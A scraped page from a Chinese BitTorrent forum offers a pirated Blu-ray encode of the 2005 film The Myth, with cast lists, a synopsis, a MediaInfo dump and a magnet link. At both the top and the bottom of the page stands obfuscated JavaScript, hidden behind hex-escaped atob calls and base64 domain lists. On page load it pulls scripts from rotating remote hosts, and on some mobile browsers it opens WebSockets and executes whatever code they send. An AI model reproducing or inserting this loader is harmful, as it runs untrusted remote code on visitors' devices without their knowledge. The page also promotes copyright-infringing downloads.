神话[国粤语配音/中文字幕].The.Myth.2005.1080p.BluRay.x265.10bit.DTS.2Audio 10.20GB

版主小s 1月前 264

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 神话 / 惊天传奇 / 钛雨 / The Myth / San wa

◎年 代 2005

◎产 地 中国大陆 / 中国香港

◎类 别 剧情 / 喜剧 / 动作 / 奇幻 / 冒险

◎语 言 英语 / 汉语普通话 / 粤语 / 韩语

◎上映日期 2005-09-23(中国大陆/中国香港) / 2005-09-15(多伦多电影节)

◎IMDb链接 https://www.imdb.com/title/tt0365847/

◎豆瓣评分 6.8/10 (230355人评价)

◎豆瓣链接 https://movie.douban.com/subject/1307023/

◎片 长 122分钟

◎导 演 唐季礼 Stanley Tong (id:1299382)

◎编 剧 唐季礼 Stanley Tong (id:1299382)

王蕙玲 Hui-Ling Wang (id:1300390)

李海蜀 Haishu Li (id:1321164)

◎演 员 成龙 Jackie Chan (id:1054531)

金喜善 Hee-seon Kim (id:1186530)

梁家辉 Tony Leung (id:1118167)

玛丽卡·沙拉瓦特 Mallika Sherawat (id:1040690)

孙周 Zhou Sun (id:1298649)

邵兵 Bing Shao (id:1274884)

于荣光 Ringo Yu (id:1274556)

谭耀文 Patrick Tam (id:1033280)

乔杉 Shan Qiao (id:1316368)

卢惠光 Ken Lo (id:1032633)

姜广涛 Guangtao Jiang (id:1317670)

叶山豪 Hayama Go (id:1001604)

崔民秀 Min-su Choi (id:1001389)

晋松 Song Jin (id:1315699)

王合喜 Ken Wong (id:1008281)

元德 Tak Yuen (id:1287153)

张磊 Lei Zhang (id:1340809)

张益群 Yiqun Zhang (id:1371405)

魏晶琦 Rita Wei (id:1420576)

李学通 Xuetong Li (id:1390113)

杰森·庄 Jason Chong (id:1078362)

胡健 Jian Hu (id:1357632)

拉姆·戈帕尔·巴贾杰 Ram Gopal Bajaj (id:1057081)

石子良 Zi-liang Shi (id:1394146)

伍刚 Gang Wu (id:1284478)

陈启国 Qiguo Chen (id:1457654)

何钧 Jun He (id:1326656)

景珂 Jingke Liang (id:1312753)

陈硕 Stone Chan (id:1397477)

蔡纲 Gang Cai (id:1365506)

苏丹舒·潘迪 Sudhanshu Pandey (id:1407702)

成龙 Jackie Chan (id:1054531)

杨受成 Albert Yeung (id:1313455)

陈自强 Willie Chan (id:1280445)

董韵诗 Barbie Tung (id:1299616)

苏志鸿 Solon So (id:1297999)

Bobby Bedi Bobby Bedi (id:1006569)

韩三平 Sanping Han (id:1274843)

杨步亭 Buting Yang (id:1330650)

许建海 Jianhai Xu (id:1384186)

黄东花 Carly Wong (id:1427870)

劳剑华 Kim Wah Lo (id:1319750)

王宗贤 Nathan Wang (id:1331828)

Gary Chase Gary Chase (id:1043565)

黎耀辉 Yiu-Fai Lai (id:1289265)

蔡崇晖 Johnny Choi (id:1318724)

黄永恒 Wing-Hung Wong (id:1300411)

邱志伟 Chi Wai Yau (id:1301446)

黄锐民 Oliver Wong (id:1290844)

庄志良 Thomas Chong (id:1280711)

蔡彦菁 Maggie Choy (id:1426247)

秦小珍 Janet Chun (id:1274236)

蔡招文基 Wendy Choi (id:1304656)

曹展能 David Tso (id:1305227)

唐季礼 Stanley Tong (id:1299382)

成龙 Jackie Chan (id:1054531)

元德 Tak Yuen (id:1287153)

深泽寛 Hiroshi Fukazawa (id:1425972)

◎标 签 成龙 / 爱情 / 香港 / 神话 / 动作 / 金喜善 / 香港电影 / 中国

◎简 介

骁勇善战的秦朝大将军蒙毅(成龙饰)受秦始皇所命,负责护送玉漱公主(金喜善饰)入秦为妃,一路上彼此情愫暗生,可蒙毅还是选择了效忠君主。秦始皇病危,蒙毅去拿长生不老药并战死沙场。而公主试药成功,在秦王死后被禁在秦王陵中……

几千年后,梦中的神秘白衣女子缠绕考古学家Jack(成龙饰)多年,一次好友William(梁家辉饰)邀他一同前往印度探险,高僧告诉Jack他被一段前世缘分困扰,Jack来到古都,开始了寻梦之旅。Jack乘直升机到郦山上空,冒险跃入瀑布,情景一如梦境。但与此同时,却有歹人一直尾随。在秦王陵中又会有什么情景?千古神话能够延续吗?

◎获奖情况 (共6项)

第25届香港电影金像奖 (2006)

最佳电影(提名)

最佳动作设计(提名)

最佳原创电影歌曲(提名)

最佳视觉效果(提名)

第28届大众电影百花奖 (2006)

最佳导演(提名)

└──唐季礼 (id:1299382)

第12届中国电影华表奖 (2007)

优秀合拍片奖

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 136307130744562466010064129545411342355 (0x668BCC68C178CFD80E295BCF5101B013)

  4. Complete name : [email protected]M.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 10.2 GiB

  8. Duration : 2 h 0 min

  9. Overall bit rate : 12.1 Mb/s

  10. Encoded date : UTC 2021-10-23 14:50:27

  11. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 2 h 0 min

  20. Bit rate : 9 056 kb/s

  21. Width : 1 920 pixels

  22. Height : 816 pixels

  23. Display aspect ratio : 2.35:1

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.241

  30. Stream size : 7.63 GiB (75%)

  31. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings : rc=crf / crf=18.0000 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.80 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x816 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Default : Yes

  34. Forced : No


  35. Audio #1

  36. ID : 2

  37. ID in the original source medium : 4353 (0x1101)

  38. Format : DTS

  39. Format/Info : Digital Theater Systems

  40. Codec ID : A_DTS

  41. Duration : 2 h 0 min

  42. Bit rate mode : Constant

  43. Bit rate : 1 510 kb/s

  44. Channel(s) : 6 channels

  45. Channel layout : C L R Ls Rs LFE

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 93.750 FPS (512 SPF)

  48. Bit depth : 24 bits

  49. Compression mode : Lossy

  50. Stream size : 1.27 GiB (12%)

  51. Title : Mandarin

  52. Language : Chinese

  53. Default : Yes

  54. Forced : No

  55. Original source medium : Blu-ray


  56. Audio #2

  57. ID : 3

  58. ID in the original source medium : 4352 (0x1100)

  59. Format : DTS

  60. Format/Info : Digital Theater Systems

  61. Codec ID : A_DTS

  62. Duration : 2 h 0 min

  63. Bit rate mode : Constant

  64. Bit rate : 1 509 kb/s

  65. Channel(s) : 6 channels

  66. Channel layout : C L R Ls Rs LFE

  67. Sampling rate : 48.0 kHz

  68. Frame rate : 93.750 FPS (512 SPF)

  69. Bit depth : 16 bits

  70. Compression mode : Lossy

  71. Stream size : 1.27 GiB (12%)

  72. Title : Cantonese

  73. Language : Chinese

  74. Default : No

  75. Forced : No

  76. Original source medium : Blu-ray


  77. Text #1

  78. ID : 4

  79. ID in the original source medium : 4608 (0x1200)

  80. Format : PGS

  81. Muxing mode : zlib

  82. Codec ID : S_HDMV/PGS

  83. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  84. Duration : 1 h 50 min

  85. Bit rate : 16.2 kb/s

  86. Count of elements : 1626

  87. Stream size : 12.8 MiB (0%)

  88. Title : chs

  89. Language : Chinese

  90. Default : Yes

  91. Forced : No

  92. Original source medium : Blu-ray


  93. Text #2

  94. ID : 5

  95. ID in the original source medium : 4609 (0x1201)

  96. Format : PGS

  97. Muxing mode : zlib

  98. Codec ID : S_HDMV/PGS

  99. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  100. Duration : 1 h 50 min

  101. Bit rate : 16.7 kb/s

  102. Count of elements : 1626

  103. Stream size : 13.2 MiB (0%)

  104. Title : cht

  105. Language : Chinese

  106. Default : No

  107. Forced : No

  108. Original source medium : Blu-ray


  109. Text #3

  110. ID : 6

  111. ID in the original source medium : 4610 (0x1202)

  112. Format : PGS

  113. Muxing mode : zlib

  114. Codec ID : S_HDMV/PGS

  115. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  116. Duration : 1 h 58 min

  117. Bit rate : 23.0 kb/s

  118. Count of elements : 1687

  119. Stream size : 19.6 MiB (0%)

  120. Title : eng

  121. Language : English

  122. Default : No

  123. Forced : No

  124. Original source medium : Blu-ray


  125. Menu

  126. 00:00:00.000 : en:Chapter 01

  127. 00:04:53.375 : en:Chapter 02

  128. 00:09:52.125 : en:Chapter 03

  129. 00:15:28.083 : en:Chapter 04

  130. 00:20:35.166 : en:Chapter 05

  131. 00:25:59.875 : en:Chapter 06

  132. 00:30:47.250 : en:Chapter 07

  133. 00:35:15.875 : en:Chapter 08

  134. 00:39:07.666 : en:Chapter 09

  135. 00:43:22.208 : en:Chapter 10

  136. 00:48:05.958 : en:Chapter 11

  137. 00:53:48.041 : en:Chapter 12

  138. 00:56:00.875 : en:Chapter 13

  139. 01:01:31.208 : en:Chapter 14

  140. 01:06:35.208 : en:Chapter 15

  141. 01:11:35.791 : en:Chapter 16

  142. 01:16:40.416 : en:Chapter 17

  143. 01:21:25.791 : en:Chapter 18

  144. 01:26:37.916 : en:Chapter 19

  145. 01:31:36.625 : en:Chapter 20

  146. 01:36:31.833 : en:Chapter 21

  147. 01:40:25.625 : en:Chapter 22

  148. 01:45:08.125 : en:Chapter 23

  149. 01:50:04.375 : en:Chapter 24

  150. 01:58:43.208 : en:Chapter 25




复制代码


TAGS 动作 奇幻 冒险 剧情 喜剧

磁力链:
  • magnet:?xt=urn:btih:9DA1E91876C30D06D5C9144149E8748902DA2931

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};